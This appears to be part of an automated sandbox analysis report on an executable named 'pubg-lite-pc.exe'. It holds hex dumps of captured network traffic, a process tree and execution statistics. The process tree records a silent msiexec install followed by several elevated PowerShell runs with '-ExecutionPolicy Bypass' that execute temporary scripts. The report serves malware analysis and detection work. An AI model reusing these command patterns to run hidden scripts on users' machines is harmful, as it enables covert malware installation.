                                                                                              Data Ascii: 7DG7Y2ag" /> <label for="login_field"> Username or email address </label> <input type="text" name="login" id="login_field" class="form-control input-block js-login-field" autocapitalize="off" autocorrect="off" autocomplete="username" autofocus="a
                                                                                              2022-08-10 04:48:03 UTC541INData Raw: 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 22 20 76 61 6c 75 65 3d 22 31 36 36 30 31 30 36 38 35 36 31 34 39 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 5f 73 65 63 72 65 74 22 20 76 61 6c 75 65 3d 22 39 30 61 66 63 39 66 33 37 66 34 38 30 62 38 62 63 37 63 34 32 37 35 34 64 31 36 62 33 62 61 66 61 32 61 61 33 33 39 33 39 33 61 66 38 62 36 66 62 65 63 64 39 30 37 66 33 31 63 35 62 66 65 34 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61
                                                                                              Data Ascii: m-control" /><input type="hidden" name="timestamp" value="1660106856149" autocomplete="off" class="form-control" /><input type="hidden" name="timestamp_secret" value="90afc9f37f480b8bc7c42754d16b3bafa2aa339393af8b6fbecd907f31c5bfe4" autocomplete="off" cla
                                                                                              2022-08-10 04:48:03 UTC542INData Raw: 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 37 36 35 32 36 31 61 30 61 30 62 63 66 62 34 33 64 32 64 37 66 31 65 32 31 65 35 36 35 36 33 34 62 31 39 32 38 30 36 35 33 31 63 32 38 36 35 36 34 37 36 31 31 39 64 35 36 65 62 63 38 36 65 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 69 67 6e 20 75 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 73 69 67 6e 20 75 70 20 66 6f 72 20 61 63 63 6f 75 6e 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72
                                                                                              Data Ascii: -click-hmac="765261a0a0bcfb43d2d7f1e21e565634b192806531c28656476119d56ebc86e0" data-analytics-event="{&quot;category&quot;:&quot;Sign up&quot;,&quot;action&quot;:&quot;click to sign up for account&quot;,&quot;label&quot;:&quot;ref_page:/gowger
                                                                                              2022-08-10 04:48:03 UTC543INData Raw: 6d 2f 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2f 62 65 74 61 2f 73 68 65 6c 66 22 3e 3c 2f 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 3e 0a 0a 0a 0a 0a 0a 20 20 3c 64 69 76 0a 20 20 20 20 63 6c 61 73 73 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6d 61 69 6e 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 22 0a 20 20 20 20 64 61 74 61 2d 63 6f 6d 6d 69 74 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 20 20 64 61 74 61 2d 64 69 73 63 75 73 73 69 6f 6e 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 20 20 64 61 74 61 2d 69 73 73 75 65 2d 61 6e 64 2d 70 72 2d 68 6f 76 65 72 63 61 72 64 73 2d 65 6e 61 62 6c 65 64 0a 20 20 3e 0a 20 20 20 20 20 20 20 20 3c 6d 61 69 6e 20 63 6c 61 73
                                                                                              Data Ascii: m/notifications/beta/shelf"></include-fragment> <div class="application-main d-flex flex-auto flex-column" data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <main clas
                                                                                              2022-08-10 04:48:03 UTC545INData Raw: 5a 41 32 4a 51 4e 67 69 55 77 74 43 73 4b 5a 75 45 68 52 78 4b 49 4f 42 56 44 43 79 55 44 59 62 70 45 6f 34 71 70 54 59 69 45 42 78 34 53 42 73 55 49 49 73 4b 73 42 77 51 45 57 6f 55 63 56 59 67 34 71 52 52 78 34 56 54 4f 42 78 34 53 41 34 6f 72 59 63 49 67 34 49 4e 69 67 4f 4b 46 48 42 46 6f 34 48 5a 45 7a 6c 73 4f 45 77 5a 62 44 68 43 6a 68 77 70 56 48 44 6f 6c 50 69 32 41 52 47 2b 6d 46 61 4e 67 46 41 63 41 6c 47 77 43 55 62 45 62 42 41 63 52 73 68 79 74 69 67 32 50 43 69 68 69 71 59 62 42 4b 63 72 59 49 4e 67 6f 6f 59 42 45 59 32 4b 34 4d 35 44 42 51 62 42 46 44 45 39 55 49 32 4a 32 52 51 78 34 55 67 47 49 56 67 47 43 67 47 43 4b 42 39 4e 44 6e 44 36 61 49 33 30 79 70 6c 63 42 67 64 6c 46 70 63 46 55 44 42 52 57 50 70 71 4c 6b 76 30 30 53 68 67 70 46
                                                                                              Data Ascii: ZA2JQNgiUwtCsKZuEhRxKIOBVDCyUDYbpEo4qpTYiEBx4SBsUIIsKsBwQEWoUcVYg4qRRx4VTOBx4SA4orYcIg4INigOKFHBFo4HZEzlsOEwZbDhCjhwpVHDolPi2ARG+mFaNgFAcAlGwCUbEbBAcRshytig2PCihiqYbBKcrYINgooYBEY2K4M5DBQbBFDE9UI2J2RQx4UgGIVgGCgGCKB9NDnD6aI30yplcBgdlFpcFUDBRWPpqLkv00ShgpF
                                                                                              2022-08-10 04:48:03 UTC546INData Raw: 54 61 69 74 68 77 36 68 43 34 70 41 44 5a 78 33 55 55 75 42 56 43 2f 54 4b 6c 55 4d 44 75 6f 46 4e 6e 5a 46 4c 67 45 71 46 4e 67 32 55 55 70 73 55 55 68 74 62 51 64 55 69 6c 4e 6f 4b 67 51 32 49 70 44 59 6f 46 49 33 71 69 6c 77 66 71 67 51 32 6e 5a 52 53 6d 32 4a 55 69 30 68 73 55 35 7a 6d 49 66 54 4b 56 53 47 33 38 46 46 49 62 50 46 52 55 7a 59 50 76 51 4a 64 62 34 6c 52 53 59 36 4d 67 42 74 36 6c 52 70 4e 6a 52 43 46 49 31 31 55 4d 45 49 64 6f 37 49 75 45 38 66 42 42 35 72 54 31 31 58 62 44 67 6f 42 78 41 71 55 46 41 50 50 52 41 34 74 34 56 46 41 4e 6f 62 56 56 4b 63 42 45 4f 4c 55 51 34 74 56 49 63 57 79 68 7a 4b 43 78 71 6a 68 58 6e 54 6d 55 46 6f 30 43 73 51 34 74 64 42 51 57 74 79 72 45 7a 6b 77 74 2f 46 55 4f 4c 55 69 5a 79 6f 4c 52 73 79 4a 54 69
                                                                                              Data Ascii: Taithw6hC4pADZx3UUuBVC/TKlUMDuoFNnZFLgEqFNg2UUpsUUhtbQdUilNoKgQ2IpDYoFI3qilwfqgQ2nZRSm2JUi0hsU5zmIfTKVSG38FFIbPFRUzYPvQJdb4lRSY6MgBt6lRpNjRCFI11UMEIdo7IuE8fBB5rT11XbDgoBxAqUFAPPRA4t4VFANobVVKcBEOLUQ4tVIcWyhzKCxqjhXnTmUFo0CsQ4tdBQWtyrEzkwt/FUOLUiZyoLRsyJTi
                                                                                              2022-08-10 04:48:03 UTC547INData Raw: 62 45 37 49 44 69 55 4f 52 73 55 67 32 50 73 79 44 59 6f 4e 69 55 4b 32 4a 51 48 45 37 49 56 73 54 73 66 42 43 74 67 64 6c 46 48 41 6f 6c 44 43 35 46 6f 2f 54 4b 49 32 43 69 35 62 42 55 72 59 38 49 67 59 6a 5a 52 52 78 2f 79 55 67 32 50 43 52 51 78 47 79 54 49 47 41 51 62 42 49 59 44 41 4a 41 4d 42 73 6d 54 41 59 63 4b 52 61 33 30 2b 45 4b 48 30 79 69 35 44 36 64 79 44 59 4a 7a 6e 4d 47 41 31 55 55 4d 41 69 55 44 36 59 55 71 68 39 50 68 41 75 48 43 4b 47 4b 67 42 74 52 53 34 38 49 6b 4b 62 51 70 79 71 42 73 37 70 56 4b 62 4f 43 67 55 32 48 5a 41 75 48 48 64 46 44 41 72 4b 30 70 39 4e 41 68 73 52 53 6d 79 73 4b 42 54 36 59 32 55 71 35 77 51 2b 6e 77 6f 70 44 5a 77 67 58 48 63 4b 4b 51 32 49 45 4e 71 4b 55 32 68 52 55 7a 5a 77 55 43 47 77 37 49 45 4e 6d 72
                                                                                              Data Ascii: bE7IDiUORsUg2PsyDYoNiUK2JQHE7IVsTsfBCtgdlFHAolDC5Fo/TKI2Ci5bBUrY8IgYjZRRx/yUg2PCRQxGyTIGAQbBIYDAJAMBsmTAYcKRa30+EKH0yi5D6dyDYJznMGA1UUMAiUD6YUqh9PhAuHCKGKgBtRS48IkKbQpyqBs7pVKbOCgU2HZAuHHdFDArK0p9NAhsRSmysKBT6Y2Uq5wQ+nwopDZwgXHcKKQ2IENqKU2hRUzZwUCGw7IENmr
                                                                                              2022-08-10 04:48:03 UTC548INData Raw: 75 73 4b 4b 6d 62 64 47 55 56 4d 32 4b 4b 58 45 37 49 50 4a 59 65 4b 37 59 63 4f 51 34 74 63 71 69 77 74 6f 6f 47 46 76 44 42 61 77 79 71 4c 65 79 43 6c 74 70 37 62 4b 70 68 57 32 31 2b 64 6b 46 42 61 74 59 77 7a 6c 51 57 46 43 71 43 7a 52 6b 53 34 4f 4c 46 55 71 6f 73 51 55 46 69 75 44 4b 67 73 54 43 5a 79 6f 4c 4f 46 55 4f 4c 4f 45 4b 63 57 44 5a 58 42 6b 34 74 34 56 6a 4a 78 59 67 63 57 67 61 49 55 34 74 47 79 49 59 57 75 68 6e 42 78 5a 77 71 68 78 59 67 59 57 38 4f 67 59 57 6e 5a 41 32 42 32 56 54 34 6e 48 70 37 70 55 48 42 43 6d 77 51 4d 4c 43 71 55 52 36 61 4a 54 44 30 77 67 59 57 44 5a 55 77 4f 49 32 55 67 5a 69 6b 42 78 4b 73 42 77 4b 49 62 42 46 48 42 51 4d 4c 65 46 59 6c 62 44 68 4d 47 63 6d 77 4f 79 66 45 2b 41 34 46 43 6a 67 68 79 6a 67 6c 42
                                                                                              Data Ascii: usKKmbdGUVM2KKXE7IPJYeK7YcOQ4tcqiwtooGFvDBawyqLeyCltp7bKphW21+dkFBatYwzlQWFCqCzRkS4OLFUqosQUFiuDKgsTCZyoLOFUOLOEKcWDZXBk4t4VjJxYgcWgaIU4tGyIYWuhnBxZwqhxYgYW8OgYWnZA2B2VT4nHp7pUHBCmwQMLCqUR6aJTD0wgYWDZUwOI2UgZikBxKsBwKIbBFHBQMLeFYlbDhMGcmwOyfE+A4FCjghyjglB
                                                                                              2022-08-10 04:48:03 UTC549INData Raw: 77 4b 56 52 77 35 52 4b 32 41 33 53 67 34 44 6c 51 6f 34 6a 5a 56 4b 32 49 32 55 79 75 47 59 62 4b 6f 7a 44 5a 52 57 62 68 41 57 34 51 5a 67 69 38 72 4d 69 4d 79 4b 32 49 56 52 6d 43 69 74 6a 31 51 48 48 68 42 73 46 49 74 62 36 5a 34 56 68 57 77 36 49 56 6a 36 61 46 62 42 49 55 4d 41 6f 72 59 42 56 47 77 34 43 41 59 6e 5a 52 57 59 68 45 5a 6c 4d 59 58 49 4d 68 47 59 4a 42 73 65 45 57 74 67 2b 6e 69 6f 42 39 50 68 44 47 51 50 70 2b 4f 69 4b 48 30 79 6f 74 4b 62 4e 79 67 47 43 44 59 68 51 67 59 44 5a 41 44 59 4e 6b 41 77 51 4b 62 4e 6c 47 69 59 6f 41 79 41 59 68 51 4c 68 77 71 46 77 4f 79 6a 52 54 5a 77 6f 70 54 59 64 55 51 75 43 4b 55 2b 6d 73 71 6d 66 54 56 6f 55 32 37 71 4b 51 32 42 51 71 5a 73 34 55 79 75 4d 6b 4e 71 69 6b 4e 76 43 47 4d 70 47 31 46 49
                                                                                              Data Ascii: wKVRw5RK2A3Sg4DlQo4jZVK2I2UyuGYbKozDZRWbhAW4QZgi8rMiMyK2IVRmCitj1QHHhBsFItb6Z4VhWw6IVj6aFbBIUMAorYBVGw4CAYnZRWYhEZlMYXIMhGYJBseEWtg+nioB9PhDGQPp+OiKH0yotKbNygGCDYhQgYDZADYNkAwQKbNlGiYoAyAYhQLhwqFwOyjRTZwopTYdUQuCKU+msqmfTVoU27qKQ2BQqZs4UyuMkNqikNvCGMpG1FI
                                                                                              2022-08-10 04:48:03 UTC551INData Raw: 70 4d 5a 55 48 6a 43 77 72 75 34 4b 69 78 74 56 61 6d 56 72 62 4e 30 46 68 61 65 79 75 45 79 74 62 59 4e 6c 55 56 74 74 66 6f 67 74 62 62 77 74 4d 71 43 31 55 56 46 71 49 71 4c 55 52 51 57 71 6d 56 42 5a 77 69 52 53 32 77 37 4b 6f 71 4c 47 30 52 44 69 77 6c 55 71 6c 76 70 71 6c 55 46 69 4a 61 59 57 6f 68 78 59 6f 70 78 59 46 55 4e 69 4e 67 69 47 41 56 68 54 43 30 37 49 55 34 73 51 4d 4c 65 45 51 32 50 43 41 73 69 77 63 56 55 68 73 56 51 77 73 34 68 51 48 44 68 58 6d 54 6e 4e 67 66 38 41 43 67 59 57 48 67 49 44 67 64 30 51 63 45 55 63 41 6b 42 46 6f 30 64 57 41 34 63 49 47 46 6e 43 41 69 31 45 6a 43 33 65 55 55 63 52 43 45 48 48 68 41 57 51 62 45 37 4b 56 52 78 4f 79 72 49 34 6c 53 71 32 4b 55 48 46 4b 4e 68 34 70 53 6a 69 4e 6c 4b 44 69 4e 6b 6f 32 41 32
                                                                                              Data Ascii: pMZUHjCwru4KixtVamVrbN0FhaeyuEytbYNlUVttfogtbbwtMqC1UVFqIqLURQWqmVBZwiRS2w7KoqLG0RDiwlUqlvpqlUFiJaYWohxYopxYFUNiNgiGAVhTC07IU4sQMLeEQ2PCAsiwcVUhsVQws4hQHDhXmTnNgf8ACgYWHgIDgd0QcEUcAkBFo0dWA4cIGFnCAi1EjC3eUUcRCEHHhAWQbE7KVRxOyrI4lSq2KUHFKNh4pSjiNlKDiNko2A2
                                                                                              2022-08-10 04:48:03 UTC552INData Raw: 57 6f 4e 69 42 4c 6f 6e 4b 4f 4d 49 59 62 46 46 62 47 41 68 38 57 62 64 42 68 61 6b 4b 7a 46 42 6d 50 33 4b 4e 4d 78 56 52 73 53 47 52 57 5a 45 5a 6c 4d 72 68 6d 50 52 41 63 59 4b 71 4e 69 4e 67 67 47 41 52 57 77 64 51 6f 34 62 4b 31 41 4e 68 32 55 56 6d 62 52 57 70 47 5a 52 57 59 4b 51 42 6b 47 49 44 6f 59 77 32 49 56 41 78 35 55 55 47 4b 71 4d 33 43 45 42 6b 55 4d 65 36 55 41 32 2b 43 69 34 4c 6a 79 68 41 78 4f 33 64 41 47 4b 69 74 69 69 42 68 39 7a 71 4c 6e 4a 54 62 32 53 68 54 59 69 2f 37 69 34 71 4c 51 78 43 49 58 41 4b 4b 51 32 4b 42 54 59 69 6b 4e 71 45 4b 62 56 42 4d 32 70 56 69 5a 74 52 63 45 4e 71 67 6d 62 4e 6b 61 77 6b 62 57 55 69 31 4d 32 71 43 4e 31 71 4b 6b 62 56 46 52 75 74 55 68 55 72 72 56 46 52 75 74 52 55 62 72 56 46 71 57 4d 71 4e 50
                                                                                              Data Ascii: WoNiBLonKOMIYbFFbGAh8WbdBhakKzFBmP3KNMxVRsSGRWZEZlMrhmPRAcYKqNiNggGARWwdQo4bK1ANh2UVmbRWpGZRWYKQBkGIDoYw2IVAx5UUGKqM3CEBkUMe6UA2+Ci4LjyhAxO3dAGKitiiBh9zqLnJTb2ShTYi/7i4qLQxCIXAKKQ2KBTYikNqEKbVBM2pViZtRcENqgmbNkawkbWUi1M2qCN1qKkbVFRutUhUrrVFRutRUbrVFqWMqNP
                                                                                              2022-08-10 04:48:03 UTC553INData Raw: 68 78 62 39 77 52 44 59 6f 6d 4d 48 46 75 79 4b 59 57 71 6f 4f 4f 36 42 68 62 73 69 47 46 69 55 45 57 69 59 5a 53 72 6b 63 55 42 59 4f 67 49 74 4b 71 51 32 49 31 4b 45 45 41 62 64 46 46 6a 49 47 62 68 56 42 46 70 51 79 32 4b 4b 4c 49 6b 46 6b 42 77 4f 79 41 34 46 41 63 41 68 7a 43 4c 52 73 68 7a 44 6a 39 36 69 69 79 71 4d 79 55 46 75 45 47 5a 42 6d 52 59 4c 56 53 49 7a 64 30 47 59 4b 6a 4d 6b 47 38 74 6c 46 62 68 41 56 52 70 51 5a 43 4d 79 44 4d 70 67 79 7a 62 53 68 42 5a 4b 52 6d 38 45 56 6d 61 71 56 4f 64 6d 38 45 47 62 56 54 6d 57 30 57 47 71 74 52 6d 2f 42 52 57 62 68 4b 43 78 32 56 52 6d 55 49 33 64 46 5a 43 43 68 47 52 49 7a 49 72 4d 70 42 75 69 6f 33 56 51 5a 41 4b 61 4b 4b 79 6f 4b 49 45 61 71 4b 7a 42 56 41 4e 76 4c 4b 4b 42 42 51 42 6a 39 71 71
                                                                                              Data Ascii: hxb9wRDYomMHFuyKYWqoOO6BhbsiGFiUEWiYZSrkcUBYOgItKqQ2I1KEEAbdFFjIGbhVBFpQy2KKLIkFkBwOyA4FAcAhzCLRshzDj96iiyqMyUFuEGZBmRYLVSIzd0GYKjMkG8tlFbhAVRpQZCMyDMpgyzbShBZKRm8EVmaqVOdm8EGbVTmW0WGqtRm/BRWbhKCx2VRmUI3dFZCChGRIzIrMpBuio3VQZAKaKKyoKIEaqKzBVANvLKKBBQBj9qq


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:06:45:31
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Users\user\Desktop\pubg-lite-pc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\pubg-lite-pc.exe"
                                                                                              Imagebase:0x920000
                                                                                              File size:3361288 bytes
                                                                                              MD5 hash:F4CB6419F1F44EE47CF33FAABF672A48
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:06:45:33
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                              Imagebase:0x7ff6612d0000
                                                                                              File size:69632 bytes
                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:06:45:34
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E82FFD10FEB1CBA14CC59B611B5F4838 C
                                                                                              Imagebase:0xbe0000
                                                                                              File size:59904 bytes
                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:06:45:40
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5\pubg-lite-pc.msi" MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\user\Desktop\pubg-lite-pc.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1660097954 " AI_EUIMSI="
                                                                                              Imagebase:0xbe0000
                                                                                              File size:59904 bytes
                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:06:45:41
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 974E8FDD22F5719B9917619AF3E37DCB
                                                                                              Imagebase:0xbe0000
                                                                                              File size:59904 bytes
                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:06:45:48
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                                                              Imagebase:0x7ff70e330000
                                                                                              File size:452608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:06:45:48
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff642fc0000
                                                                                              File size:875008 bytes
                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:17
                                                                                              Start time:06:46:10
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7419.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi73B8.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr73B9.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr73BA.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                                                              Imagebase:0x7ff70e330000
                                                                                              File size:452608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:18
                                                                                              Start time:06:46:10
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff642fc0000
                                                                                              File size:875008 bytes
                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:22
                                                                                              Start time:06:46:39
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE5D4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE5A2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE5A3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE5A4.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                                                              Imagebase:0x7ff70e330000
                                                                                              File size:452608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Target ID:23
                                                                                              Start time:06:46:39
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff642fc0000
                                                                                              File size:875008 bytes
                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Target ID:24
                                                                                              Start time:06:47:02
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3EE5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3EB4.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3EB5.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3EB6.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                                                              Imagebase:0x7ff70e330000
                                                                                              File size:452608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Target ID:25
                                                                                              Start time:06:47:02
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff642fc0000
                                                                                              File size:875008 bytes
                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Target ID:26
                                                                                              Start time:06:47:28
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA352.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiA310.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrA311.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrA312.txt" -propSep " :<->: " -testPrefix "_testValue."
                                                                                              Imagebase:0x7ff70e330000
                                                                                              File size:452608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET

                                                                                              General

                                                                                              Target ID:27
                                                                                              Start time:06:47:28
                                                                                              Start date:10/08/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff642fc0000
                                                                                              File size:875008 bytes
                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.4%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:18.3%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:106
